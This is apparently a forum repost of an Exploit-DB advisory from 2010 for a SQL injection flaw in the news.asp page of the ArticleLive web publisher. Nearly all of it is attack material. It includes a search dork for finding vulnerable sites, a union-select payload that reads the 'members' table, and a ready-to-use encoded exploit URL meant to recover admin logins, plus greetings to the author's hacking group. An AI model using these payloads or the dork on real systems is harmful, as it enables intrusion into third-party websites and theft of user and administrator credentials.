- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 12526
- Проверка EDB
-
- Пройдено
- Автор
- RA3CH
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- N/A
- Дата публикации
- 2010-05-07
Код:
*******************************************************************************
# Author : ra3ch
# Product : ArticleLive (Interspire Website Publisher)
# Price : N/A
# Site : www.dz4all.com/cc
# Dork : "Website by Spokane Web Communications"
# Risk : High
*
**Vulnerable script: news.asp?id= (SQL-injection)
*
---------------------------------------------------------
*
*
**http://server/[path]/news.asp?id= [SQL Inject]
*
*
**news.asp?id=34 union select 1,2,3,4,5,6,7,8,9,10,11 from members
*
*
**Exploit:
*
**http://server/news.asp?id=118%20union%20select%201,2,3,4,5,6,7,8,9,10,11%20from%20members
**Admin Login->
*
*
**http://server/[path]/Use your intelligence
*
*""""""""""""""""""""
** Greetz to : ALLAH
** All Members of http://www.DZ4All.cOm/Cc
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & n2n & .....
- Источник
- www.exploit-db.com